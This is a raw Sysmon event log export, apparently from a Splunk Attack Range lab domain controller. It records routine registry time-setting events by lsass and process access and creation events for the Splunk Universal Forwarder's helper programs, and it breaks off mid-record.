16:49:35.341{29E67E80-7CBD-6019-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x053d70df) 13241300x8000000000000000179925Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-SetValue2021-02-03 16:49:35.341{29E67E80-7CBD-6019-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6fa44-0x2b92b407) 13241300x8000000000000000179924Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-SetValue2021-02-03 16:49:35.341{29E67E80-7CBD-6019-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6fa4c-0x8d571c07) 13241300x8000000000000000179923Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-SetValue2021-02-03 16:49:35.341{29E67E80-7CBD-6019-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6fa54-0xef1b8407) 13241300x8000000000000000179922Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-SetValue2021-02-03 16:49:35.341{29E67E80-7CBD-6019-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000179921Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-SetValue2021-02-03 16:49:35.341{29E67E80-7CBD-6019-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x053d70df) 13241300x8000000000000000179920Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-SetValue2021-02-03 16:49:35.341{29E67E80-7CBD-6019-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6fa44-0x2b92b407) 13241300x8000000000000000179919Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-SetValue2021-02-03 16:49:35.341{29E67E80-7CBD-6019-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6fa4c-0x8d571c07) 13241300x8000000000000000179918Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-SetValue2021-02-03 16:49:35.341{29E67E80-7CBD-6019-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6fa54-0xef1b8407) 10341000x8000000000000000179952Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:36.919{29E67E80-7D64-6019-B400-00000000A301}16482392C:\Windows\system32\conhost.exe{29E67E80-D420-601A-3330-00000000A301}1028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179951Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:36.919{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179950Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:36.919{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179949Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:36.919{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179948Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:36.919{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179947Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:36.919{29E67E80-7CBD-6019-0500-00000000A301}640756C:\Windows\system32\csrss.exe{29E67E80-D420-601A-3330-00000000A301}1028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000179946Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:36.919{29E67E80-7D64-6019-B000-00000000A301}11603872C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{29E67E80-D420-601A-3330-00000000A301}1028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000179945Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:36.920{29E67E80-D420-601A-3330-00000000A301}1028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{29E67E80-7CBD-6019-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000179944Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:36.404{29E67E80-D420-601A-3230-00000000A301}62081704C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179943Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:36.248{29E67E80-7D64-6019-B400-00000000A301}16482392C:\Windows\system32\conhost.exe{29E67E80-D420-601A-3230-00000000A301}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179942Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:36.248{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179941Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:36.248{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179940Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:36.248{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179939Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:36.248{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179938Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:36.248{29E67E80-7CBD-6019-0500-00000000A301}6402192C:\Windows\system32\csrss.exe{29E67E80-D420-601A-3230-00000000A301}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000179937Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:36.248{29E67E80-7D64-6019-B000-00000000A301}11603872C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{29E67E80-D420-601A-3230-00000000A301}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000179936Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:36.248{29E67E80-D420-601A-3230-00000000A301}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{29E67E80-7CBD-6019-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000179962Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:37.669{29E67E80-D421-601A-3430-00000000A301}56645928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179961Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:37.529{29E67E80-7D64-6019-B400-00000000A301}16482392C:\Windows\system32\conhost.exe{29E67E80-D421-601A-3430-00000000A301}5664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179960Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:37.529{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179959Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:37.529{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179958Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:37.529{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179957Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:37.529{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179956Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:37.529{29E67E80-7CBD-6019-0500-00000000A301}640656C:\Windows\system32\csrss.exe{29E67E80-D421-601A-3430-00000000A301}5664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000179955Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:37.529{29E67E80-7D64-6019-B000-00000000A301}11603872C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{29E67E80-D421-601A-3430-00000000A301}5664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000179954Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:37.530{29E67E80-D421-601A-3430-00000000A301}5664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{29E67E80-7CBD-6019-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program 